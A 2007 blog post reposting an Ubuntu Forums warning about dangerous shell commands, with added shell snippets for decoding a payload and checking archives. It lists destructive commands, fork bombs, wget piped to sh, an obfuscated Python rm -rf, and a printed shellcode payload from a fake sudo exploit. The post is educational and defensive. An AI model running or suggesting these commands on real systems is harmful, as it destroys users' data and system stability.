12/09/2007

What not to do in Ubuntu? Dangerous Commands for Ubuntu


I just saw this on the Ubuntu Forums and I'm publishing it here for your information, buddies. For those who don't know what Ubuntu is, let me introduce it.

Ubuntu is a community-developed operating system that is perfect for laptops, desktops and servers. Whether you use it at home, at school or at work, Ubuntu contains all the applications you'll ever need, from word processing and email applications to web server software and programming tools. The best thing is that it is always available free of charge. You do not pay any licensing fees. You can download, use and share Ubuntu with others.

The announcement on the forum says: "We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer. I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect."

So what are these commands and what do they do?

Note: Don't try these on your OS. I'm in no way responsible. Just look at them and get a feel for them.

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

Code:

rm -rf /
rm -rf .
rm -rf *

Another interesting one comes up when trying to delete all hidden entries in a directory (hidden entries start with a "."). You may be tempted to use:

Code:

rm -r .*

The only problem is that .., the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative that I can think of for this would be
Code:

rm -r .[^.]*

which will exclude the entry "..". Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.
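The limitation mentioned above is that `.[^.]*` skips names that begin with two dots, such as `..b`. The following is an added example, not part of the forum announcement: it prints what each pattern expands to in a constructed scratch directory instead of deleting anything, and pairs two patterns to cover every hidden entry except `.` and `..`. The function names `expansion_of` and `hidden_entries` are hypothetical.

```shell
# expansion_of DIR PATTERN: show what the shell would hand to a command for
# PATTERN inside DIR, using printf instead of rm.
# Shells differ on '.*': dash and older bash include . and .., while
# bash 5.2 and later skip them by default (globskipdots).
expansion_of() (
    cd "$1" || exit 1
    # $2 is left unquoted on purpose so the shell expands it.
    printf '%s\n' $2
)

# hidden_entries DIR: every dot-entry in DIR except "." and "..".
hidden_entries() (
    cd "$1" || exit 1
    #   .[!.]*  dot, one non-dot character, then anything  (.bashrc, .a)
    #   ..?*    two dots plus at least one more character  (..data, ...)
    # [!.] is the POSIX spelling of the [^.] used above.
    for name in .[!.]* ..?*; do
        # A pattern with no match stays as literal text; skip it.
        if [ -e "$name" ] || [ -L "$name" ]; then
            printf '%s\n' "$name"
        fi
    done
)

# Constructed scratch directory for the demonstration.
demo=$(mktemp -d)
touch "$demo/.a" "$demo/..b" "$demo/..." "$demo/visible"
mkdir "$demo/.config"

echo "'.*' expands to:";      expansion_of "$demo" '.*'
echo "'.[!.]*' expands to:";  expansion_of "$demo" '.[!.]*'
echo "safe pattern pair:";    hidden_entries "$demo"
```

Reviewing the printed list before handing it to any destructive command is the habit this is meant to build.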

Reformat: Data on the device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Oftentimes this will clobber the filesystem and cause total loss of data:

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until the system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash (this one looks really intriguing and provokes curiosity):

Code:

:(){:|:&};:

In Perl

Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make a habit of extracting tars inside a freshly created directory.

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB, filling your hard drive. You should not touch data from an untrusted source.
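One way to look at an archive before extracting it, covering both the tarbomb and the decompression bomb cases above. This is an added example, not part of the forum announcement; the function names and the 1 GiB default budget are assumptions, and it relies on `tar -O` and `head -c` as found in GNU and BSD userlands.

```shell
# classify_listing: reads member names (one per line) on stdin and prints
# entries=<count> toplevel=<distinct first path components> unsafe=<count>
classify_listing() {
    awk '
        { n++; name = $0; sub(/^\.\//, "", name) }
        # Absolute paths and ".." components can land outside the target dir.
        name ~ /^\// || name ~ /(^|\/)\.\.(\/|$)/ { unsafe++ }
        { split(name, part, "/"); if (part[1] != "") top[part[1]] = 1 }
        END {
            for (t in top) k++
            printf "entries=%d toplevel=%d unsafe=%d\n", n, k, unsafe
        }'
}

# exceeds_budget ARCHIVE MAX_BYTES: succeeds if the file data inside the
# archive is larger than MAX_BYTES. The data is streamed to a counter and the
# pipeline stops just past the budget, so a bomb never fills the disk.
exceeds_budget() {
    seen=$(tar -xOf "$1" 2>/dev/null | head -c "$(($2 + 1))" | wc -c)
    [ "$seen" -gt "$2" ]
}

# tar_report ARCHIVE [MAX_BYTES]: one-line summary of the checks above.
# The default budget is an assumed 1 GiB.
tar_report() {
    summary=$(tar -tf "$1" | classify_listing)
    if exceeds_budget "$1" "${2:-1073741824}"; then
        printf '%s oversize=yes\n' "$summary"
    else
        printf '%s oversize=no\n' "$summary"
    fi
}

# extract_fresh ARCHIVE: extract into a newly created, empty directory and
# print its path, so stray members cannot mix with existing files.
extract_fresh() {
    dest=$(mktemp -d) || return 1
    tar -xf "$1" -C "$dest" && printf '%s\n' "$dest"
}
```

A report with `toplevel` greater than 1, a very large `entries` count, any `unsafe` member or `oversize=yes` is a reason to stop and ask questions before running `extract_fresh`.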

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.

Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
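The hidden command can be recovered without running anything. The payload contains four `push imm32` instructions (opcode `\x68`) followed by `not` instructions (`\xf7\x16`, `\xf7\x56\x04`, ...) that flip every bit of the pushed values in place. The following added example, not part of the original announcement, repeats that arithmetic on the bytes copied from the listing above and only prints the result; the name `decode_pushed` is hypothetical.

```shell
# Immediates of the four `push imm32` instructions (opcode 0x68), copied from
# the payload above in the order they are pushed.
PUSHED='ff ff ff ff
df d0 df d9
8d 99 df 81
8d 92 df d2'

# decode_pushed GROUPS: rebuild the string the code assembles on the stack.
decode_pushed() {
    rev=''
    out=''
    # The stack grows downward, so the last value pushed sits at the lowest
    # address: reverse the order of the groups first.
    while IFS= read -r group; do
        rev="$group $rev"
    done <<EOF
$1
EOF
    for hex in $rev; do
        # The `not` instructions flip every bit of each byte.
        byte=$(( 0x$hex ^ 0xff ))
        if [ "$byte" -eq 0 ]; then break; fi   # NUL ends the C string
        out="$out$(printf "\\$(printf '%03o' "$byte")")"
    done
    printf '%s\n' "$out"
}

decode_pushed "$PUSHED"    # prints the text only; nothing is executed
```

The decoded text is what gets passed to `/bin/sh -c`, while the readable `cp -p /bin/sh /tmp/.beyond` string at the end of the array is what a casual reader notices instead.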


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:
Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

